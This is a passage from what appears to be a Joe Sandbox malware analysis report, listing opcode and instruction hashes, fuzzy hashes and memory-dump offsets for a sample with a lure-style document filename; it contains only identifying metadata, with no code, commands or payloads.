                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e5b1ff21a164024d9797dda037c25070a264941228e95c7638e7e8514cd45359
                                                                                                                                                    • Instruction ID: 57f179c820c34f44ed1011eb12b62768b067fa6148451fbd6ef3c16565494ff5
                                                                                                                                                    • Opcode Fuzzy Hash: e5b1ff21a164024d9797dda037c25070a264941228e95c7638e7e8514cd45359
                                                                                                                                                    • Instruction Fuzzy Hash: 59F0A578D05208EFCB84DFA8D945A9DBBB5EB48300F10C1AADC1897351D6359A55DF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 72ada47fbda79870f7cd05b441efa3943db6efa9438a5f0884d4c921d791be70
                                                                                                                                                    • Instruction ID: 9fb5b50aef5599bd309d068f53c4e7ee92a49c48d301c466027a1f6281807642
                                                                                                                                                    • Opcode Fuzzy Hash: 72ada47fbda79870f7cd05b441efa3943db6efa9438a5f0884d4c921d791be70
                                                                                                                                                    • Instruction Fuzzy Hash: 65E0DF75C0A2489FEB00EFF9E961AAE7FA09B44208F1045EEC50597561EA750A08DB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4d8f98919d58511ba1611daac384a1a49dc7b54622c258aa511daff6161de369
                                                                                                                                                    • Instruction ID: 1dab42b63faee2bbb0d77c9ef01278d970110db923322ba259c1ecb440278cb5
                                                                                                                                                    • Opcode Fuzzy Hash: 4d8f98919d58511ba1611daac384a1a49dc7b54622c258aa511daff6161de369
                                                                                                                                                    • Instruction Fuzzy Hash: CEF0C974D04208EFCB84DFA8D59569CBBB4EB48304F14D1EED81897351DA315A41CF84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4413a9b3e2005fea8c75c29c5f0afe819e6f0f9eddbcc8bd70d0c76d5d9eab77
                                                                                                                                                    • Instruction ID: 51b5f8ebef04888e5d2219c626c31c7f45643733d93b331cab5b094340cfb18b
                                                                                                                                                    • Opcode Fuzzy Hash: 4413a9b3e2005fea8c75c29c5f0afe819e6f0f9eddbcc8bd70d0c76d5d9eab77
                                                                                                                                                    • Instruction Fuzzy Hash: 2AE02B76B4532387AF24166E388022CD181EBC4A20705163EFC19C730CCD11CC0103C0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7060b5576b71ba1fc03cc5b67ef7c2795dd58d9476b57ea6d2bc96005ad935fb
                                                                                                                                                    • Instruction ID: a113494135f5bc6f6816d65e9a1dd9f4a6b3eade12cbf64b45c195220db9fdcd
                                                                                                                                                    • Opcode Fuzzy Hash: 7060b5576b71ba1fc03cc5b67ef7c2795dd58d9476b57ea6d2bc96005ad935fb
                                                                                                                                                    • Instruction Fuzzy Hash: 03E08630700700ABDB246D686801BA673969B45659F550069A6059B680F961FC538BE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6b3b2f391662c65558f570746d47679533e1004bc9043796c8cc9978f40cd574
                                                                                                                                                    • Instruction ID: eb149c9f719593608a49c2cff9c07f3c03b6d5744163485161f0b302d82cf182
                                                                                                                                                    • Opcode Fuzzy Hash: 6b3b2f391662c65558f570746d47679533e1004bc9043796c8cc9978f40cd574
                                                                                                                                                    • Instruction Fuzzy Hash: 3FE02630A40700ABDB345E606801BFA73959B41369F10062EE5115B2C0F562FC538EA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 83438f66e1bfdce75d0c50b860b3276ce2fc43b588adfd87341986682b3721fd
                                                                                                                                                    • Instruction ID: 329f64049ffadf2033d8905dad95f90263a75164c826df0ab266d088fb302c62
                                                                                                                                                    • Opcode Fuzzy Hash: 83438f66e1bfdce75d0c50b860b3276ce2fc43b588adfd87341986682b3721fd
                                                                                                                                                    • Instruction Fuzzy Hash: 78F03434A01218CFDB25CF58E888BDDB7B2FB08300F4482A9E519A7381EB346E85CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1a2ae8f84b8e084ba7e7ff2dda378a6d4fff441c1a5ac3672782ce0fa893bfa5
                                                                                                                                                    • Instruction ID: 4e1c07cc5b5db2f1a137192a7c7fa41309e9ced0d7a28b6265baec2f4b1f3d09
                                                                                                                                                    • Opcode Fuzzy Hash: 1a2ae8f84b8e084ba7e7ff2dda378a6d4fff441c1a5ac3672782ce0fa893bfa5
                                                                                                                                                    • Instruction Fuzzy Hash: AAF06534909244DFDB01DFA4D554A9CBF74FF49311F1481D9E845273A1D6315E94DF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f24634e02c7348d7583e320a4e723abd67a7751c546a470f2cfa4633a451267d
                                                                                                                                                    • Instruction ID: 3de7899f34f0e50e0f28f3d7e5bde16c74f631d80d0b1c6d8bf93b2001dad783
                                                                                                                                                    • Opcode Fuzzy Hash: f24634e02c7348d7583e320a4e723abd67a7751c546a470f2cfa4633a451267d
                                                                                                                                                    • Instruction Fuzzy Hash: D1E0D835B006048FCB11EB54D05199CB3B1EF88328F148969E019AB240CB36AD4BCFD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2b6d7e8a15043b0919d9eaecb521836320cb6fc5f0f74dc8a55b01e1ef3b9aac
                                                                                                                                                    • Instruction ID: 78bed880dabe6b30139f31207040535f6771f5cd08bf383256fda90bcec5cd1d
                                                                                                                                                    • Opcode Fuzzy Hash: 2b6d7e8a15043b0919d9eaecb521836320cb6fc5f0f74dc8a55b01e1ef3b9aac
                                                                                                                                                    • Instruction Fuzzy Hash: 4CE0A574D04208EFCB44DFA8E54569CBBB5EB49304F1081AA984993340D631AA51DF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2b6d7e8a15043b0919d9eaecb521836320cb6fc5f0f74dc8a55b01e1ef3b9aac
                                                                                                                                                    • Instruction ID: a14c032db64331b954a76995b0157272da28eaca879611dab875f922e71ec0f2
                                                                                                                                                    • Opcode Fuzzy Hash: 2b6d7e8a15043b0919d9eaecb521836320cb6fc5f0f74dc8a55b01e1ef3b9aac
                                                                                                                                                    • Instruction Fuzzy Hash: 37E0A574D04208EFCB44DFA8D94569CBBB5EB88301F1081AAD80993340D6319A51DF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2b6d7e8a15043b0919d9eaecb521836320cb6fc5f0f74dc8a55b01e1ef3b9aac
                                                                                                                                                    • Instruction ID: 6c6eccd84aa583b11096a2083b7e16b9389123899e9d8117c96b6854483c6e99
                                                                                                                                                    • Opcode Fuzzy Hash: 2b6d7e8a15043b0919d9eaecb521836320cb6fc5f0f74dc8a55b01e1ef3b9aac
                                                                                                                                                    • Instruction Fuzzy Hash: 74E0A574D04208EFCB44DFA8D54569DBBF9EB49300F1081EADC5A93340D631AA51DB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 84eb0206f186740bd111e3945533a31596bc2e3fddebd10af756b14d40f453fe
                                                                                                                                                    • Instruction ID: 10abd1e6b60ec1e8e91d0b513269b9289aaa429a47cc54fe051fe7108183cc63
                                                                                                                                                    • Opcode Fuzzy Hash: 84eb0206f186740bd111e3945533a31596bc2e3fddebd10af756b14d40f453fe
                                                                                                                                                    • Instruction Fuzzy Hash: D6E09A70C19248DFCB51EFB8D9552DCBFB5EB0A201F2802EDC889A3380E2314688CB01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1eb87be09aaec65b56e5979add42df22e12ef2584f404ae837c65449fcf36b3b
                                                                                                                                                    • Instruction ID: de2c9ba65086a5d91aeb5ea7d39703ac409dcb45e40849d6b6d55a28c3f7ea27
                                                                                                                                                    • Opcode Fuzzy Hash: 1eb87be09aaec65b56e5979add42df22e12ef2584f404ae837c65449fcf36b3b
                                                                                                                                                    • Instruction Fuzzy Hash: 18E01A70C09249DFDF41EBB8A5552DC7FF4EB1D205F1411EDC94896242E6714688CB01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3f8026f1fa58695869c6c8b887ed71d4ea64cbedf04992480c0d3db463d9cc75
                                                                                                                                                    • Instruction ID: 0b9b12c8c0a7e4e3c4c7ade6b932e5a2699d467adc98ee5879d999a57269923b
                                                                                                                                                    • Opcode Fuzzy Hash: 3f8026f1fa58695869c6c8b887ed71d4ea64cbedf04992480c0d3db463d9cc75
                                                                                                                                                    • Instruction Fuzzy Hash: 75E08C75D062189EEB01EFF8E921AAE7FA49B4430CF1045EED505A72A1DF314A049BA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6ab7c937a4e88460702894588fc5bf51a9302b69e4e83e8e374474b9b8dedee9
                                                                                                                                                    • Instruction ID: f547af263e49bae279c8837f8d5d2a42d4155efd10306ff43bf8c7fa5b2fab75
                                                                                                                                                    • Opcode Fuzzy Hash: 6ab7c937a4e88460702894588fc5bf51a9302b69e4e83e8e374474b9b8dedee9
                                                                                                                                                    • Instruction Fuzzy Hash: EBE092348092889FC701DF68E9651ACBFB4EF4A204F1890DEDC8457392D6316E0ACF52
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6b5dcc9c4084c2bc2973b37abe69d66bb0acdc4eb9e943bf2b5aeaefc781bffa
                                                                                                                                                    • Instruction ID: ad3065829c1e1881f18556f38699d2419fa7ab919dbeefd65675bddf7be64425
                                                                                                                                                    • Opcode Fuzzy Hash: 6b5dcc9c4084c2bc2973b37abe69d66bb0acdc4eb9e943bf2b5aeaefc781bffa
                                                                                                                                                    • Instruction Fuzzy Hash: 86E0E534D09148AFDB04DFA8E5556ACBFB4EB8D314F1882EEC89967382DA315A46CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fec654717e738852486368708dfcbe3e15f0747ce41972f37bd6037395697305
                                                                                                                                                    • Instruction ID: 75e41a0cfaffe77dbe8a443dd720849fa12ac648697603bf6c5ebfc48e7c7dee
                                                                                                                                                    • Opcode Fuzzy Hash: fec654717e738852486368708dfcbe3e15f0747ce41972f37bd6037395697305
                                                                                                                                                    • Instruction Fuzzy Hash: 38E08C7890A0449BCB48DF68E990BBDBFA8DB5E308B1465CDCD4997282DA324D02CA00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4289d6c605cea826fd3f708b4893a39c0bc388ab1b1c037931a972191999d7e3
                                                                                                                                                    • Instruction ID: 78fcb1ecef16bfddda8a12f01af04dfa287f6bd7276dd21e67248964886545aa
                                                                                                                                                    • Opcode Fuzzy Hash: 4289d6c605cea826fd3f708b4893a39c0bc388ab1b1c037931a972191999d7e3
                                                                                                                                                    • Instruction Fuzzy Hash: 16E01A34904208DFC704DF98E9459ACBB79FB89305F1492EDDD082B341CA315A86CB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d274645f363f0669e5ff7ee0a4927699c7514620669d891e938311ed459b8207
                                                                                                                                                    • Instruction ID: 9d1825d14112125cc9fbdfe6da71a89d6d3a46d7a5d668c2e6e3f15f38fb94bc
                                                                                                                                                    • Opcode Fuzzy Hash: d274645f363f0669e5ff7ee0a4927699c7514620669d891e938311ed459b8207
                                                                                                                                                    • Instruction Fuzzy Hash: 5FE0E534E04208EFCB44DFA8D9956ACBBF8EB88304F14D1EAC818A3350DA319A41CF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 210e22470c09e5e7fede22ee7c745760c1aac798de3047335b634a306afb4701
                                                                                                                                                    • Instruction ID: 8f5ede1cdbf683fcd942e87ada780990e75876bc75caef3bae56355941bba989
                                                                                                                                                    • Opcode Fuzzy Hash: 210e22470c09e5e7fede22ee7c745760c1aac798de3047335b634a306afb4701
                                                                                                                                                    • Instruction Fuzzy Hash: 22E01A70D05208EFCB44EFA8E5456ADBBB9EB48301F1081AAD808A7344D7365A54DF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6d538614a8c488145072d06dae12c181c67163d99ad993485a53aa6f7ec9f944
                                                                                                                                                    • Instruction ID: d2107a39ea40ba31105350beef4b5802037ec6fc27cd3074afcb47730d655ea8
                                                                                                                                                    • Opcode Fuzzy Hash: 6d538614a8c488145072d06dae12c181c67163d99ad993485a53aa6f7ec9f944
                                                                                                                                                    • Instruction Fuzzy Hash: A8E06570D04308EFCB00DFA8D41069CBBB8FB88300F0081AAE808A2344D7314A44CF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5f9970622bddaf9a5a87317670294326f5f74c4cd2248554ed51969e1ee348f9
                                                                                                                                                    • Instruction ID: 635205f2886f720f345a42fa067b3063a68093fbe739e2fba6bfc9f620c584d9
                                                                                                                                                    • Opcode Fuzzy Hash: 5f9970622bddaf9a5a87317670294326f5f74c4cd2248554ed51969e1ee348f9
                                                                                                                                                    • Instruction Fuzzy Hash: 8BE09271A0434CEFCB51DFB4D9056AC7BF1EF41320B1086EED408D7291D6759E059B11
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 22e502aee43312b59d1a1de48e49b668863cf884d049667fcffca940991493fd
                                                                                                                                                    • Instruction ID: 6e360b986db4a77a99b00ef904e4c09ea5be3b8f3f39583dad57d8834553ad5d
                                                                                                                                                    • Opcode Fuzzy Hash: 22e502aee43312b59d1a1de48e49b668863cf884d049667fcffca940991493fd
                                                                                                                                                    • Instruction Fuzzy Hash: AEE0ED34E04208EFC744DFA8D94569CBBF4EB48300F1081E9C81893340E7356E51DF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 72f2ec00fbb38106c0ba6d3c1ecc23c9e2d142529a20ad7e31469b3651e846c3
                                                                                                                                                    • Instruction ID: 6f3130d8a59b91926fd154c90538fb2341cbc4c624ad69db896cd671d13e802f
                                                                                                                                                    • Opcode Fuzzy Hash: 72f2ec00fbb38106c0ba6d3c1ecc23c9e2d142529a20ad7e31469b3651e846c3
                                                                                                                                                    • Instruction Fuzzy Hash: BBE01A70D05208EFCB44DFA8E5446ADBBF9EB48301F1081AAD844A7340E7356A65DF80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 413b9c16e449c0e1479447a70e446a6a39f6c321553bc28bf8a1fc1e62ac5ec3
                                                                                                                                                    • Instruction ID: b2ee3af33d98389e4fc6719cd2fb6cbf866c10cdbb7e2680ac86d8e987c3e6ee
                                                                                                                                                    • Opcode Fuzzy Hash: 413b9c16e449c0e1479447a70e446a6a39f6c321553bc28bf8a1fc1e62ac5ec3
                                                                                                                                                    • Instruction Fuzzy Hash: C0E08634919108DBCB04DFA8E9559ADBF74EB49304F1492DDCD0557341CA325E45CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b7b4f057993f2617cf1d39ed1b5a554a1987fed231595566039b80bc16983e2c
                                                                                                                                                    • Instruction ID: beceac1995e1de51bf45ed28c0ca75eff19edce31ce838cbaa75023613f97c99
                                                                                                                                                    • Opcode Fuzzy Hash: b7b4f057993f2617cf1d39ed1b5a554a1987fed231595566039b80bc16983e2c
                                                                                                                                                    • Instruction Fuzzy Hash: 7CE048348091489BC714DBA8D5611BCBFB89B49505F1481DDDD4957381E6365E45C741
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
